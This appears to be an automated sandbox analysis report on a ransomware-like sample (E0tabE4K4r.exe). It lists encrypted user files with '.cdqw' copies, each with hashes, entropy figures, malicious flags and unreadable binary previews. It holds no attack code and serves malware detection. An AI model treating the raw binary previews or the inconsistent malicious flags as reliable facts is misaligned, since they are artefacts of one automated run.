                                                                                                                                                  Preview:TQDGE...l.1/}f>/.[H...m......q./VK.=.......]@..SX.....l....x"..z#dS.V..T.M.....3..9?._.[.....}uQ*.n]. nF...v..f.3f...w6=).k..t..s.Z...$...y/V..6....i..x...j....H...../-...u....;.Gw.,^I0.9.2...w....;.z4v.r8..o.?.o.)..'.\%}I......,......j..4B..6.d......50R1..zu.7It.s.Y^...kl[_".@.`.|=.....O,.pY....2..n.Io.lg...f.j....R..t#....a........J.I.cl..m.)|.v=...p..*v.VI.K..Y...Z.j2k.@...>....p.,..J%./v0..../.N....5..;.A!)y{6.maQ.aKQ.T:...p....'.q.$..6...y>.^..(..ec.B.U..=R..A.D.R...y.....V.....`}.......n..s....?Vx..r@6.......).g.3.4...Q.g.........)..Z..(Ws...t&.1#.S........H.....(.|.(...]-X..;.s....q......<.x.......+....|H.W..)]I.t6.;._{.T...c..5.P].a.{.{N.....e.S...N!..r=...0.l.3`6.\.]W.......!T..~......B.c.g.R.g-RO.uN.e ..*.m..g..9.3;...D....1\. .....L%z....1\_........c....N..,/.tU.V^..F....R.).t... i].....e......=.)..D....$..3....=.H@fX..e&..`.g....6..Y.>...].6Z.O-%.C....J...i`^E!S..c. .....6D.=.MJ...+`{}s.r.D(0.O'...=........7..V....a..A....Q

                                                                                                                                                  C:\Users\user\Desktop\TQDGENUHWP.mp3.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.859818948835278
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:AzOXrWhPjPFiGaCv9vRXq08W06Km8RdwOW5zhp2PINaXNVeXH12bD:AYrEBcEhqVVY8RdwOUzhp2PjdIXuD
                                                                                                                                                  MD5:CD30667FEF7F999D67F5AB5D974395B1
                                                                                                                                                  SHA1:62E72B35CE01620405617C87ECCA1F23C9B47FAE
                                                                                                                                                  SHA-256:21AD3552FC9066F25B4AA5185F71B6CED5C8D29371BA8F4CA16ED956CFB39D88
                                                                                                                                                  SHA-512:332E4009C61CDD0D7D47ABD991E00490155358554ECFF96BA6D008FB46490CFD0765D02611FBFB3D1670D6CEEEDE22A392E024B65134CA9683EAE8CBA7FA5057
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TQDGE...l.1/}f>/.[H...m......q./VK.=.......]@..SX.....l....x"..z#dS.V..T.M.....3..9?._.[.....}uQ*.n]. nF...v..f.3f...w6=).k..t..s.Z...$...y/V..6....i..x...j....H...../-...u....;.Gw.,^I0.9.2...w....;.z4v.r8..o.?.o.)..'.\%}I......,......j..4B..6.d......50R1..zu.7It.s.Y^...kl[_".@.`.|=.....O,.pY....2..n.Io.lg...f.j....R..t#....a........J.I.cl..m.)|.v=...p..*v.VI.K..Y...Z.j2k.@...>....p.,..J%./v0..../.N....5..;.A!)y{6.maQ.aKQ.T:...p....'.q.$..6...y>.^..(..ec.B.U..=R..A.D.R...y.....V.....`}.......n..s....?Vx..r@6.......).g.3.4...Q.g.........)..Z..(Ws...t&.1#.S........H.....(.|.(...]-X..;.s....q......<.x.......+....|H.W..)]I.t6.;._{.T...c..5.P].a.{.{N.....e.S...N!..r=...0.l.3`6.\.]W.......!T..~......B.c.g.R.g-RO.uN.e ..*.m..g..9.3;...D....1\. .....L%z....1\_........c....N..,/.tU.V^..F....R.).t... i].....e......=.)..D....$..3....=.H@fX..e&..`.g....6..Y.>...].6Z.O-%.C....J...i`^E!S..c. .....6D.=.MJ...+`{}s.r.D(0.O'...=........7..V....a..A....Q

                                                                                                                                                  C:\Users\user\Desktop\TQDGENUHWP.pdf

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.8355593687335245
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:tGw2ShfzpEyjom0iWT9lJ+ZpmLV47CIkwBABPzDG1qKereZ76xqAVcUuVVPV2bD:kwTvEGobsZpmZ47CwAB/GobrNHcUuV4D
                                                                                                                                                  MD5:3E3691638D711B6C27729C940A14FA41
                                                                                                                                                  SHA1:A465914A3D053D7B08781009BEB7BBB9688DA051
                                                                                                                                                  SHA-256:3FD9A48424C4298AF1C3BF0F560DF9FFA2C9CEB803CBF188B71FAC69D72299BD
                                                                                                                                                  SHA-512:7B7B8B45E56F6913B89FE15B6999058FF33B218A9AAA4263C5FEE5A2014978E7769F6B0C05B673D620F5F4E395BD411EAB621A8B6ECA9CCA6A88031ED40F4A5C
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:TQDGE.d......0..l.9..J...h+.iS..eX..g..i..+..nF0#..g?..P....M.G,.[..]._[O.k..*.sxh.P... .G3...yFGM...s.......D?^...5>~.Lj...Q.T.gv...)A.._.Q!.[...X.&..SL.&.....M.....FBv.R~.T.\....X...5UeZ.....).P.<C....F..(..@=e1.J..f9r.6....s.k._HJM..a...A....W.-...H._X{.p.F.es.9.w..C|Wt7.Oc._.-...V.)w.Y...G?.-e.....[$.H>...[+V.d..&7...5.N.\..'8..W..~.G..y.W...G.....n&......I..TK....(._..9[.O......<..zj..i......<.^..V...............{v.-..w=...J.......M.;;.`..J....d......i....a.\7.#Vl.-......5.h..(..Z;....5TU.T...TB........B...E...t.g........E#I.m.p..1......q.....Z.r."...e~t...L..5..(J#Vd.|......#M^.)......(za.rD_|.l...Q8../.3.ed....x...t."z.a...d..s..#3..L^.Gj...d........!.KF.M...Z.. >..vj.C...K.V...UN.U...Y.[...R.6..q-.T.sWG4....|....#..Ot..vtH|..z.F2[V...X..........Bq0y...m*.....,..GsH....q.1U.m".`.B,e([..=4..B...`...k...Tr..[......*....8r..t...G...f`...)fh..)Ao..*.SR........O....'.k.w.X~..K..O.&g...$.<..".dW.=......=C.k...0I...m..c..u.....60....z.C.

                                                                                                                                                  C:\Users\user\Desktop\TQDGENUHWP.pdf.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.8355593687335245
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:tGw2ShfzpEyjom0iWT9lJ+ZpmLV47CIkwBABPzDG1qKereZ76xqAVcUuVVPV2bD:kwTvEGobsZpmZ47CwAB/GobrNHcUuV4D
                                                                                                                                                  MD5:3E3691638D711B6C27729C940A14FA41
                                                                                                                                                  SHA1:A465914A3D053D7B08781009BEB7BBB9688DA051
                                                                                                                                                  SHA-256:3FD9A48424C4298AF1C3BF0F560DF9FFA2C9CEB803CBF188B71FAC69D72299BD
                                                                                                                                                  SHA-512:7B7B8B45E56F6913B89FE15B6999058FF33B218A9AAA4263C5FEE5A2014978E7769F6B0C05B673D620F5F4E395BD411EAB621A8B6ECA9CCA6A88031ED40F4A5C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TQDGE.d......0..l.9..J...h+.iS..eX..g..i..+..nF0#..g?..P....M.G,.[..]._[O.k..*.sxh.P... .G3...yFGM...s.......D?^...5>~.Lj...Q.T.gv...)A.._.Q!.[...X.&..SL.&.....M.....FBv.R~.T.\....X...5UeZ.....).P.<C....F..(..@=e1.J..f9r.6....s.k._HJM..a...A....W.-...H._X{.p.F.es.9.w..C|Wt7.Oc._.-...V.)w.Y...G?.-e.....[$.H>...[+V.d..&7...5.N.\..'8..W..~.G..y.W...G.....n&......I..TK....(._..9[.O......<..zj..i......<.^..V...............{v.-..w=...J.......M.;;.`..J....d......i....a.\7.#Vl.-......5.h..(..Z;....5TU.T...TB........B...E...t.g........E#I.m.p..1......q.....Z.r."...e~t...L..5..(J#Vd.|......#M^.)......(za.rD_|.l...Q8../.3.ed....x...t."z.a...d..s..#3..L^.Gj...d........!.KF.M...Z.. >..vj.C...K.V...UN.U...Y.[...R.6..q-.T.sWG4....|....#..Ot..vtH|..z.F2[V...X..........Bq0y...m*.....,..GsH....q.1U.m".`.B,e([..=4..B...`...k...Tr..[......*....8r..t...G...f`...)fh..)Ao..*.SR........O....'.k.w.X~..K..O.&g...$.<..".dW.=......=C.k...0I...m..c..u.....60....z.C.

                                                                                                                                                  C:\Users\user\Desktop\TTCBKWZYOC.docx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.868701403956782
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:cVfZDk8wcR4gWuxQyD6vcfNYqhXQADdvMyV4dvy2TwpNZUXgkuP/BOlM8c5+KhMH:wDmAxkkfN9QAVMy0vVERUX4Om8cGD
                                                                                                                                                  MD5:9A8FEE7DD6AED17D9B5FEAF8AC5F1221
                                                                                                                                                  SHA1:1EA1FF163538847BE66F3EC709213ED0B028074D
                                                                                                                                                  SHA-256:917E1CE68DF198385FA77806305956F1A4FCF5566EE7DC4C5C37D63DB903A18D
                                                                                                                                                  SHA-512:D88C03B2E5CC38AB4E5F2A7D7CBE1D57A7B51998F93CD0BED5D502D4090BD7F46FBBB628E1161567C2AD3C1BAC637B289B7A6E9B8B8D1C2871337FC3CE546AD3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TTCBK.."..jF]......Q..o..z..F!.....PQ.......5G.....q.A=.g._..Z.yy.i......q.....o~x.g....<......-..&.-..?..D7.....A..r%3.#?.....)~........5..$N..;(..Eo...a......... ..[...V.......g`.o....sK(..|j.....f.u`....][e.^2....0....:Z...3..l....].b.#.F.Q..;.\....ZpX..9.AcN/N....r.....B....Sn.F.v#...~~..mb.M.%..JG4..\6..3_.....9>P>}..v..m...v^e...q.r..6q.qc...F)..Dd.m...F.+f..t..........!....mVU1.#....Q..s.*. .".....;.<......b.R......x}.d..Dn..}....nFr...h.....e.#.H......;>.. ....o.\W....Jj..2.y4..03..&u.......4 .y"d....x........$.0..=.v\....B..Zef..q...)!.q....}.d...=..1.tM..T......F...Of..#..#.0..!.....-Up...W...";VGi....No..nG.mO.>..G...9./.......f.?.PJ......4:K2H(.Rm+m....bj..$...]...:...;.N7.....4Mxz....5Akg.7...C-.l.m5p.m.h..'..MJ..lKj.N#..V....0.'...S..k.L.........z1y..:....H.p.xW.P...+.S..A[.V@..%u......vGo.h..!.5?.NBhG.c0.s.7.)...I...z.n.t_......_9.&j.8PC...E..lX.v......l7rK.q&z.*..u....n...d..2H.'../.Ox.24..r)<,s..<.........h.R./..Pb8.m.

                                                                                                                                                  C:\Users\user\Desktop\TTCBKWZYOC.docx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.868701403956782
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:cVfZDk8wcR4gWuxQyD6vcfNYqhXQADdvMyV4dvy2TwpNZUXgkuP/BOlM8c5+KhMH:wDmAxkkfN9QAVMy0vVERUX4Om8cGD
                                                                                                                                                  MD5:9A8FEE7DD6AED17D9B5FEAF8AC5F1221
                                                                                                                                                  SHA1:1EA1FF163538847BE66F3EC709213ED0B028074D
                                                                                                                                                  SHA-256:917E1CE68DF198385FA77806305956F1A4FCF5566EE7DC4C5C37D63DB903A18D
                                                                                                                                                  SHA-512:D88C03B2E5CC38AB4E5F2A7D7CBE1D57A7B51998F93CD0BED5D502D4090BD7F46FBBB628E1161567C2AD3C1BAC637B289B7A6E9B8B8D1C2871337FC3CE546AD3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TTCBK.."..jF]......Q..o..z..F!.....PQ.......5G.....q.A=.g._..Z.yy.i......q.....o~x.g....<......-..&.-..?..D7.....A..r%3.#?.....)~........5..$N..;(..Eo...a......... ..[...V.......g`.o....sK(..|j.....f.u`....][e.^2....0....:Z...3..l....].b.#.F.Q..;.\....ZpX..9.AcN/N....r.....B....Sn.F.v#...~~..mb.M.%..JG4..\6..3_.....9>P>}..v..m...v^e...q.r..6q.qc...F)..Dd.m...F.+f..t..........!....mVU1.#....Q..s.*. .".....;.<......b.R......x}.d..Dn..}....nFr...h.....e.#.H......;>.. ....o.\W....Jj..2.y4..03..&u.......4 .y"d....x........$.0..=.v\....B..Zef..q...)!.q....}.d...=..1.tM..T......F...Of..#..#.0..!.....-Up...W...";VGi....No..nG.mO.>..G...9./.......f.?.PJ......4:K2H(.Rm+m....bj..$...]...:...;.N7.....4Mxz....5Akg.7...C-.l.m5p.m.h..'..MJ..lKj.N#..V....0.'...S..k.L.........z1y..:....H.p.xW.P...+.S..A[.V@..%u......vGo.h..!.5?.NBhG.c0.s.7.)...I...z.n.t_......_9.&j.8PC...E..lX.v......l7rK.q&z.*..u....n...d..2H.'../.Ox.24..r)<,s..<.........h.R./..Pb8.m.

                                                                                                                                                  C:\Users\user\Desktop\TTCBKWZYOC.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.850878966107342
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:39lVEyfg3u7G6PBqPngv2F0j6VyltRdY87y4rwJFfUkqpZU5IY5wNSf52bD:3pfge7G6PBqPnG2FO6VyltUgy4EJFHho
                                                                                                                                                  MD5:1257E5781814DE4D890F44C2BF25BE56
                                                                                                                                                  SHA1:1C328F7A65BE317E287B0423D168D3DD953027A7
                                                                                                                                                  SHA-256:022DC6FD09F56231FF022B22FF077C0F6C9D9FE05E0D9B6BF931BAE5BBF4A2DC
                                                                                                                                                  SHA-512:9B7DBADC8BB99272F35D20A12CD1FAF6249AAF38694FEB968EAB03C7E1FB546CB28817831653117EDCB9C7F4C468E3BA102F0BE979401885AD602935BB400C06
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TTCBK.b<.LS.H..PD`.m..K.#...A.2k........s...o6..t.....^....*.....2.7U.7...M..X4........}!.eay.......#}.(....s...,L....6..S4....:..^..G..C......S..X..P...]..~.q.u.........J.j7.....4.U..T....6.....a[.....C$......h......~..k.p........6...X....Y..4ND.?Os.......1.z...o.b...!F..0U....[T...*l...9...n...[.W..o.>.d.AY........S...P.P..V. .ox.<.. \.......f.zl.^.z.j.6i...Jg....o......r.>....^/....u....a..|$L...J.qyo.....;..r....w.d+....p.D/.>...z.^0........:........*g.A=....8.Q<........i......\...c-..U..R...../(..$.H^^...m... .j...nI....>'..|.h$..*....-7tN*........z.A....zU[D.z.....J...?..z0.;..W.H...N.....9uwx60..uY....G.my.... ...~...'..q.:O......<."...W.".aw.n.k.O....T.~....&..Ol $.......]..o..Q.dD.....$.....|..N_..d..r....n0.y.oi..o.......H.@.Y..?.*.vD.8.N6...S..`d...X*~.jz7...r..B..yq.!.!:O.K.m.}...m3...C....{..._.|.....4..<..s.H].Ei.Q.HvO.4.5P.Y'....J..;.u...V...$...x.Tt.._.'.so.L...w..r..w.._d.*...`:;x.)....THm\Ou..T..l....*..

                                                                                                                                                  C:\Users\user\Desktop\TTCBKWZYOC.png.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.850878966107342
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:39lVEyfg3u7G6PBqPngv2F0j6VyltRdY87y4rwJFfUkqpZU5IY5wNSf52bD:3pfge7G6PBqPnG2FO6VyltUgy4EJFHho
                                                                                                                                                  MD5:1257E5781814DE4D890F44C2BF25BE56
                                                                                                                                                  SHA1:1C328F7A65BE317E287B0423D168D3DD953027A7
                                                                                                                                                  SHA-256:022DC6FD09F56231FF022B22FF077C0F6C9D9FE05E0D9B6BF931BAE5BBF4A2DC
                                                                                                                                                  SHA-512:9B7DBADC8BB99272F35D20A12CD1FAF6249AAF38694FEB968EAB03C7E1FB546CB28817831653117EDCB9C7F4C468E3BA102F0BE979401885AD602935BB400C06
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TTCBK.b<.LS.H..PD`.m..K.#...A.2k........s...o6..t.....^....*.....2.7U.7...M..X4........}!.eay.......#}.(....s...,L....6..S4....:..^..G..C......S..X..P...]..~.q.u.........J.j7.....4.U..T....6.....a[.....C$......h......~..k.p........6...X....Y..4ND.?Os.......1.z...o.b...!F..0U....[T...*l...9...n...[.W..o.>.d.AY........S...P.P..V. .ox.<.. \.......f.zl.^.z.j.6i...Jg....o......r.>....^/....u....a..|$L...J.qyo.....;..r....w.d+....p.D/.>...z.^0........:........*g.A=....8.Q<........i......\...c-..U..R...../(..$.H^^...m... .j...nI....>'..|.h$..*....-7tN*........z.A....zU[D.z.....J...?..z0.;..W.H...N.....9uwx60..uY....G.my.... ...~...'..q.:O......<."...W.".aw.n.k.O....T.~....&..Ol $.......]..o..Q.dD.....$.....|..N_..d..r....n0.y.oi..o.......H.@.Y..?.*.vD.8.N6...S..`d...X*~.jz7...r..B..yq.!.!:O.K.m.}...m3...C....{..._.|.....4..<..s.H].Ei.Q.HvO.4.5P.Y'....J..;.u...V...$...x.Tt.._.'.so.L...w..r..w.._d.*...`:;x.)....THm\Ou..T..l....*..

                                                                                                                                                  C:\Users\user\Desktop\TTCBKWZYOC.xlsx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.844480826507712
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:hy9mSBtlyXnsFfW5ikVCxZuFxZtOsNz+q2CoCvs12h907ax5phGM3r3uIrRdJud0:hwmStEXnefW5ieFxZQsR6CvOE7GMbuI/
                                                                                                                                                  MD5:5191166C81DCDD2AEFDC98EAAC2AC566
                                                                                                                                                  SHA1:E2EB65318446F6F65981F5C370D60DE8FAAA69C9
                                                                                                                                                  SHA-256:9064FEBC641EE4D79EC640BE251288FF15CF157D2F657DA9DF5F97989C3A863D
                                                                                                                                                  SHA-512:B25795B99D0414BB542D49A302711C14FEEDB9E763D6E1784C1F67A9D737AF09108C76623248B22D6F5E1434EC9A15E8F63EA1255C64B7A9FC2E3071D866F53B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TTCBK..^..P.........i..C...8..C.T[..*.........$N...e:[.....o...j......aueD..K...`..A.|U[.GZ-.<Pa.F.8...4..*l:4:~%>...;..!..oK....l...a...............i.2.%.....f.F..*..(7.E.S<.>!.I&...0_x.rf8...OK...M..r..aY.....i...f^....".D.[....]...u.....2.G..h..3j]..]......UqM5.@r.=.....q|3..$ ....V.!.U.e...........OH..!)...>.....Y7.c.......M. k.^Z.....8.....".>......k..f..5y7.*....q..Zi.?...`.P...Z/.pjvoxfS..$pK....t.._..OE..e...H..p{..7=..f]R\.T2.M.........m..2Po.P..u..]!.we2>....J..W..;R.%UN...N...$....;....L.o...z..eE......S}.E.8.b.8c.......S~......3.E...5e(?..4......$.....)=9...........c.....k......61.R...~ .6.L...E_.=..*...W.....{x?.q.I=.ur....Z&8b.%.9..8......$.*.$.4..{d....L.EK..j...}..N.7....f|...N`.......S.P#uj.b.*..w.E......j.+..,3.1m.....+..v.A...7.....A.......-../<G...;.C..P..sdt...^.Z....Y....4..cY8.d...A......g.W..L.%...2..)}r.N.7U`.:..#m.......V..^e.....V.W.V.psy.MN...'......,O.../\..Ml.TJ.l0..H~p.+.&.X....e.Msp...'..=K......

                                                                                                                                                  C:\Users\user\Desktop\TTCBKWZYOC.xlsx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.844480826507712
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:hy9mSBtlyXnsFfW5ikVCxZuFxZtOsNz+q2CoCvs12h907ax5phGM3r3uIrRdJud0:hwmStEXnefW5ieFxZQsR6CvOE7GMbuI/
                                                                                                                                                  MD5:5191166C81DCDD2AEFDC98EAAC2AC566
                                                                                                                                                  SHA1:E2EB65318446F6F65981F5C370D60DE8FAAA69C9
                                                                                                                                                  SHA-256:9064FEBC641EE4D79EC640BE251288FF15CF157D2F657DA9DF5F97989C3A863D
                                                                                                                                                  SHA-512:B25795B99D0414BB542D49A302711C14FEEDB9E763D6E1784C1F67A9D737AF09108C76623248B22D6F5E1434EC9A15E8F63EA1255C64B7A9FC2E3071D866F53B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TTCBK..^..P.........i..C...8..C.T[..*.........$N...e:[.....o...j......aueD..K...`..A.|U[.GZ-.<Pa.F.8...4..*l:4:~%>...;..!..oK....l...a...............i.2.%.....f.F..*..(7.E.S<.>!.I&...0_x.rf8...OK...M..r..aY.....i...f^....".D.[....]...u.....2.G..h..3j]..]......UqM5.@r.=.....q|3..$ ....V.!.U.e...........OH..!)...>.....Y7.c.......M. k.^Z.....8.....".>......k..f..5y7.*....q..Zi.?...`.P...Z/.pjvoxfS..$pK....t.._..OE..e...H..p{..7=..f]R\.T2.M.........m..2Po.P..u..]!.we2>....J..W..;R.%UN...N...$....;....L.o...z..eE......S}.E.8.b.8c.......S~......3.E...5e(?..4......$.....)=9...........c.....k......61.R...~ .6.L...E_.=..*...W.....{x?.q.I=.ur....Z&8b.%.9..8......$.*.$.4..{d....L.EK..j...}..N.7....f|...N`.......S.P#uj.b.*..w.E......j.+..,3.1m.....+..v.A...7.....A.......-../<G...;.C..P..sdt...^.Z....Y....4..cY8.d...A......g.W..L.%...2..)}r.N.7U`.:..#m.......V..^e.....V.W.V.psy.MN...'......,O.../\..Ml.TJ.l0..H~p.+.&.X....e.Msp...'..=K......

                                                                                                                                                  C:\Users\user\Desktop\TTCBKWZYOC\LTKMYBSEYZ.mp3

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.860861317460259
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:d/IMX1lrWmu411D8JAVhrAFHrhgNvwhYr/qI2rUG1fKULYyizKpH2bD:dgMrP11DRXytgNYI/32rNb8yi1D
                                                                                                                                                  MD5:7F79C5E077A6E27A26D99D7DD1A0217B
                                                                                                                                                  SHA1:56E1E3F47E77355CDBA9AC03F1B7EA529834F15D
                                                                                                                                                  SHA-256:3D2A7334A4BF82654D9A6627994BEBB9D62DFE5C6422D1D841AD043CF987D396
                                                                                                                                                  SHA-512:BFDFF42D98BD078D57CD948EDD1E057161CB2A66922801002F30C3B26F6B7B95FE5260F2AD15ED91C4BEED5DA7BDC10BAE335D7070D1EF548AEA847A720BC3EC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:LTKMY......<.QV5'.X.3..v.W...d%....CfG..".F@}...).../MH..b.\*.3..,.FYi.......|.hY.....$..N/...WI P .L9p.2.[...$kv...A.../%1.E.(..2.9.........y#;..6.R..5..c....@...m....lV...U..v..D.!/],.i....s.g.Mx.....q@..$0E.e....2.............u...?`.v..s..>bm.U.?.W......M7...,.....y..........X.]Z.3.9.g06&.p...eq.....jvq.H.{...K...4..T|.^..g..K.....(..A...PI#...E....2=......3K.a.{........+.1...;20`..*..$.HFb)Y.......0=.Vh.....Eb%@2..M..e...`.X.3$..g....gH.'s....o.%........}...8.....,a..F|.p.d.h..`...j..8...."@...i~..3....0,.8.../,...z.&.A....^...]W.?7...Cc.A+..9Px....|.:..SX.7.a.Ke..c.q ...C(H|S...H....&..3\=...g.......;.Y0.sd..e...D...lR..'.^].kS..N.....}..8L.&..U.$_3(%...bw.K93*wCl.q...|..!V....Bt+.....$-t.+~#@1.p.o.m....K{.....}|~..)*M..Q.{K.#R..07.b.\.....u....S^...]. ..c-`...U[..2Ir.s.Q.N.sd`.......s.Ud^..f.Q*).t.#..?|.Y.S..F...'...XZQ41..v6.....1A(....F`.b........<....K..uk3...5H}.e.'.'k......G.rK...q.{K.. ..2.Z.h-k..|......o...<.A........*.n....V.

                                                                                                                                                  C:\Users\user\Desktop\TTCBKWZYOC\LTKMYBSEYZ.mp3.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.860861317460259
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:d/IMX1lrWmu411D8JAVhrAFHrhgNvwhYr/qI2rUG1fKULYyizKpH2bD:dgMrP11DRXytgNYI/32rNb8yi1D
                                                                                                                                                  MD5:7F79C5E077A6E27A26D99D7DD1A0217B
                                                                                                                                                  SHA1:56E1E3F47E77355CDBA9AC03F1B7EA529834F15D
                                                                                                                                                  SHA-256:3D2A7334A4BF82654D9A6627994BEBB9D62DFE5C6422D1D841AD043CF987D396
                                                                                                                                                  SHA-512:BFDFF42D98BD078D57CD948EDD1E057161CB2A66922801002F30C3B26F6B7B95FE5260F2AD15ED91C4BEED5DA7BDC10BAE335D7070D1EF548AEA847A720BC3EC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:LTKMY......<.QV5'.X.3..v.W...d%....CfG..".F@}...).../MH..b.\*.3..,.FYi.......|.hY.....$..N/...WI P .L9p.2.[...$kv...A.../%1.E.(..2.9.........y#;..6.R..5..c....@...m....lV...U..v..D.!/],.i....s.g.Mx.....q@..$0E.e....2.............u...?`.v..s..>bm.U.?.W......M7...,.....y..........X.]Z.3.9.g06&.p...eq.....jvq.H.{...K...4..T|.^..g..K.....(..A...PI#...E....2=......3K.a.{........+.1...;20`..*..$.HFb)Y.......0=.Vh.....Eb%@2..M..e...`.X.3$..g....gH.'s....o.%........}...8.....,a..F|.p.d.h..`...j..8...."@...i~..3....0,.8.../,...z.&.A....^...]W.?7...Cc.A+..9Px....|.:..SX.7.a.Ke..c.q ...C(H|S...H....&..3\=...g.......;.Y0.sd..e...D...lR..'.^].kS..N.....}..8L.&..U.$_3(%...bw.K93*wCl.q...|..!V....Bt+.....$-t.+~#@1.p.o.m....K{.....}|~..)*M..Q.{K.#R..07.b.\.....u....S^...]. ..c-`...U[..2Ir.s.Q.N.sd`.......s.Ud^..f.Q*).t.#..?|.Y.S..F...'...XZQ41..v6.....1A(....F`.b........<....K..uk3...5H}.e.'.'k......G.rK...q.{K.. ..2.Z.h-k..|......o...<.A........*.n....V.

                                                                                                                                                  C:\Users\user\Desktop\TTCBKWZYOC\TQDGENUHWP.pdf

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.852823691565869
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:ebVakJHDKNxVhpFN634sWLxvrVjxp9YJN46YyvSJSI+wby2bD:cVa++xFEWJxjxn0yjyCSIBbJD
                                                                                                                                                  MD5:BAE8D55C0E0B13A2EA47062B8A02C18C
                                                                                                                                                  SHA1:77A9233F2C4E8A85D2257EE4498FDD67B880013A
                                                                                                                                                  SHA-256:E2A99CE2FBCEEB49898287D2583739292E04524E04B7D8074922B17A9EF354D2
                                                                                                                                                  SHA-512:C555ADD503A1332783EB275E819113404D324F95A266E1C554C994CB406C7FB099CD614513276B9E5443214AECDAF3C64F1A406ED2E374E92BE10D4C294FCEFB
                                                                                                                                                  Malicious:false
